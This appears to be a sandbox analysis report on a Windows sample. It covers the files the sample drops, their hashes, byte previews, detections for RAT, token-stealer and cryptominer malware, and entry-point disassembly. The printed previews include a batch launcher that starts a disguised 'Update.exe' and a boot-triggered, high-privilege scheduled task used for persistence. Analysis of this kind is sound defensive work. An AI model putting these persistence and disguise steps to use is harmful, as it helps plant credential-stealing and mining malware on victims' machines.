                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\ProgramData\main.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):256
                                                                                        Entropy (8bit):5.075305064813836
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:QkEOTunIBdGKoQRw+HG9UwknaZ5MHPKw+Hs8E1wknaZ5MH6tuovn:QGT9OKjm9XrHMvk1EmrHMO
                                                                                        MD5:D716653D9325A97C6B6CE4775020B5FC
                                                                                        SHA1:90CA4C1938DFAA71C8818AC0ED94C5D48B0A77C5
                                                                                        SHA-256:5A12EABD3F17A23FE3ADCD66CD156F04504CBA6BA548B62B93D5BF7A1E4BC269
                                                                                        SHA-512:E8515741DA3C0956D7762CACD5729E8E9E633ADABB0BB2D00D5EA1AAB9C0944A04EACE48F5ED127525BCBE1F5F4C2BAC9EECEF380E9F5EC35F8E12FFEE0F92F0
                                                                                        Malicious:false
                                                                                        Preview::l..Tasklist /fi "PID eq 5064" | find ":"..if Errorlevel 1 (.. Timeout /T 1 /Nobreak.. Goto l..)..Cd "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog"..Timeout /T 1 /Nobreak..Start "" "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"..
                                                                                        Process:C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe
                                                                                        File Type:RAR archive data, v5
                                                                                        Category:dropped
                                                                                        Size (bytes):2190
                                                                                        Entropy (8bit):7.9126550228540875
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:L21NXRteW1ykYUggif/B9d7FdXW1sfaJyCyuSaUvrp4:L2HXRsW1yBUgp/jd7TXWT7STG
                                                                                        MD5:C6A3611D353C828029A3B78F910F9945
                                                                                        SHA1:45E658B6C7B3A0F0DAC4B16207C711FB69265820
                                                                                        SHA-256:AC4EA65D6DFF20A4F114C6419F8212E7D3257CE18858124DD490E36CF6D8F68D
                                                                                        SHA-512:325F50BDA2493B4F34F7B8DCC2DD539BD4BE63588987B8A2226617B1F99A321D2D1DA906CE8CACFB4CF98CA4216006D380F6C8A15E48B903CABAD069ECF8CC89
                                                                                        Malicious:true
                                                                                        Preview:Rar!......kP!.....A>.:W....^.....U....N.$....;z......{...a.....\....V..b.oQ.u.....g...N.....c.$..."..;..v.J...0.P.B..X.1[.:O...7-.tM....'.@.Mp.Te.A...E4...U..S...p...h!.s\..Iy.....@..i...e...5<>..=..."...].u....u./l4.......uk.....z....e/T.PjMo..^..|......$.r..]cgs.U.g.7.#g......f..t,.e...,..pp.m...-..:.=..&I.u.._......*.+.. !F.=,..o\..MY]]o..@...M.;..9t.D.09b...:.k3.P...5....^...[..).b.`.7*...=..."...C.....n..=.b.{Z9.._g...vy.......n....~V...r.:E`IC,8...v'..;y7U...K|.hE.[.O.gf....n...(.:q..w.o ....y(X3`...G8.....f_..u..p5.j..Z.]..i,O.5K..Cy.3.V.%.&..........Q.A.y....U.5.C.:~<...^..4....:rX..hz5c;.<.U...pun....!m...z.......}...bLQCW..n.}.s....sxBN.}1..6..3..w....p.v..S.9E#..2>A......q]Ri%5I....#.C^..v......X.exi.0C\1.T2.....P.[R2NNx.RF..G..=. .,...Cd.i.....4....+{zO._.r.r..%.@lf.G..%.c..J.y&.......5q|{_^?..3y.T......B.T,.Z.|].1d\n!.Y.V.*ZK.c}U.!.0nc.^.7.....*..#@...).NIji#.l...S`.FF`../W.\.x.(.ZXJ....6.....|.N...!'..../.g
                                                                                        Process:C:\ProgramData\setup.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):161792
                                                                                        Entropy (8bit):5.8318794599287465
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
                                                                                        MD5:1667C96053EAA078109F8B0C9500FC9D
                                                                                        SHA1:E0F567763BAAAA757F66F96951D9810F45F69F30
                                                                                        SHA-256:F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
                                                                                        SHA-512:6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\setup.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1490
                                                                                        Entropy (8bit):5.1015990235428035
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                                        MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                                        SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                                        SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                                        SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                                        Process:C:\ProgramData\main.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):5872344
                                                                                        Entropy (8bit):7.487098820179109
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR65:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciN
                                                                                        MD5:5DF3E2C717F267899F37EC6E8FC7F47A
                                                                                        SHA1:5E980079F67215BF69B8C1C16B56F40BF4A29958
                                                                                        SHA-256:E3F5C557ECE7EC27CB7E4A26482EADF0D9065065D94B2919F9B881BC74800E6E
                                                                                        SHA-512:8CEF1184120E010421D69FCF271822B3F0B45E34A1565152A3F2DECB8F500D0E69DE9816D9075683FCFB0F431713F3FBC42AC2D87503CDCDDE125ABA3FA1635D
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(....*..(....*..{....*"..}....*..*F.{....o....s....*...2...{....o..../..{.....o....*.s,...*...(....,.(........2...{....o....2..{.....o....*.{......o....*..s,...*v..(....,.(.......{.....o....*2.{....o....*...2...{....o....2..*.{.....o.....{.....o....*>.{.....o....&.*..0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1940658735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllul4tllZ:NllU4
                                                                                        MD5:1F8AD5BD42EAAA119401D892686E8BEB
                                                                                        SHA1:43DB0FA51B00EFD1E7B8A0960EFEE9F2E5E20C73
                                                                                        SHA-256:1332CE95EEB24F8F94739946470E254AFD12FEAF6FC111E7DA4B11909E75E2C8
                                                                                        SHA-512:4718815221B51FAB21E6F24856ACCDA8FD69C18795C94F286862C28810559D93439BE717DCF04492EBFEC23B3087D1CFA8649A6836EBAB8E96F85FFAD7CE35D6
                                                                                        Malicious:false
                                                                                        Preview:@...e................................................@..........
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):14544
                                                                                        Entropy (8bit):6.2660301556221185
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):5345280
                                                                                        Entropy (8bit):6.701640724838757
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:LrZwo40cLwthpjCU5FLnFUWbU5y1vsdCXZe1bwCUoJXiN5rFkKYVd:Lra1Wbd1vs0JeaCVJX25GKYVd
                                                                                        MD5:470F48122F70CD013CE039F8049F8906
                                                                                        SHA1:673B6BE8163580BA70403321663F5EDBB0565F12
                                                                                        SHA-256:B4B33DDBDD8953EE4BCAAA0F7B71468FAD1F5A7F8CFC7AFCF35810D2B1792D2A
                                                                                        SHA-512:C44BA477DF1876D507FE24C54957BE6A92C2E7FA498103C49A74A34D6090FB2253DCAF81F36EAF82BB3AEEFCB8A414579EAD130B50523DB842C95299D76D6226
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: Joe Security
                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: unknown
                                                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: Florian Roth
                                                                                        • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: ditekSHen
                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......=r.Yy...y...y...2k..p...2k......2k..o...llh.}...ll..j...ll......ll..u...y.......2k..`....c..*...O...;...O.......O...z...O.j.x...y...x...O...x...Richy...........................PE..d..../.d.........."....%..6...L.....DS3........@..........................................`.................................................T.M......`.......................p..|.....J.......................J.(....J.@.............6.8............................text.....6.......6................. ..`.rdata........6.......6.............@..@.data...d,3...M.......M.............@....pdata................N.............@..@_RANDOMX..............P.............@..`_TEXT_CN.&.......(....P.............@..`_TEXT_CN.....0........P.............@..`_RDATA..\....P........Q.............@..@.rsrc........`........Q.............@..@.reloc..|....p........Q.............@..B................................
                                                                                        Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1490
                                                                                        Entropy (8bit):5.1015990235428035
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                                        MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                                        SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                                        SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                                        SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Entropy (8bit):7.999682296143684
                                                                                        TrID:
                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:TS-240605-Millenium1.exe
                                                                                        File size:38'730'377 bytes
                                                                                        MD5:4ce7dec7f0af15277eec727a9e20142e
                                                                                        SHA1:5bae148e9a1865370d25d805439e60f057806a04
                                                                                        SHA256:fccf2be42bab41f3d1f8bb7778765729cdf5ed10a0bd65871ba3bd2b827c2402
                                                                                        SHA512:123fac8db9b2fea104fed3c57e304402bf1c02dbf1f19046f67ecadab67ed95af71ee8661e9d7b7b87a5b0cf092fa65fddc206d3557ada0b876ac00e6b2185b5
                                                                                        SSDEEP:786432:xRaNrdmuVZJW4j1B6O7WfE1StERPeJSu/6jsdbOr4q:xR0rEuTJWSfbyfEItERPeguAsd
                                                                                        TLSH:9487338023021932F6A94179E79C640AEFF5F636A7D5666357E043B32F43B92C628F53
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................-.....................,.............................................................Rich...........
                                                                                        Icon Hash:2d2e3797b32b2b99
                                                                                        Entrypoint:0x14000c540
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6655CB4C [Tue May 28 12:17:16 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:2
                                                                                        File Version Major:5
                                                                                        File Version Minor:2
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:2
                                                                                        Import Hash:f4f2e2b03fe5666a721620fcea3aea9b
                                                                                        Instruction
                                                                                        dec eax
                                                                                        sub esp, 28h
                                                                                        call 00007F92C12054ACh
                                                                                        dec eax
                                                                                        add esp, 28h
                                                                                        jmp 00007F92C12050CFh
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        dec eax
                                                                                        sub esp, 28h
                                                                                        call 00007F92C1205A24h
                                                                                        test eax, eax
                                                                                        je 00007F92C1205273h
                                                                                        dec eax
                                                                                        mov eax, dword ptr [00000030h]
                                                                                        dec eax
                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                        jmp 00007F92C1205257h
                                                                                        dec eax
                                                                                        cmp ecx, eax
                                                                                        je 00007F92C1205266h
                                                                                        xor eax, eax
                                                                                        dec eax
                                                                                        cmpxchg dword ptr [00034FACh], ecx
                                                                                        jne 00007F92C1205240h
                                                                                        xor al, al
                                                                                        dec eax
                                                                                        add esp, 28h
                                                                                        ret
                                                                                        mov al, 01h
                                                                                        jmp 00007F92C1205249h
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        dec eax
                                                                                        sub esp, 28h
                                                                                        test ecx, ecx
                                                                                        jne 00007F92C1205259h
                                                                                        mov byte ptr [00034F95h], 00000001h
                                                                                        call 00007F92C1205831h
                                                                                        call 00007F92C1205E38h
                                                                                        test al, al
                                                                                        jne 00007F92C1205256h
                                                                                        xor al, al
                                                                                        jmp 00007F92C1205266h
                                                                                        call 00007F92C1213DCFh
                                                                                        test al, al
                                                                                        jne 00007F92C120525Bh
                                                                                        xor ecx, ecx
                                                                                        call 00007F92C1205E48h
                                                                                        jmp 00007F92C120523Ch
                                                                                        mov al, 01h
                                                                                        dec eax
                                                                                        add esp, 28h
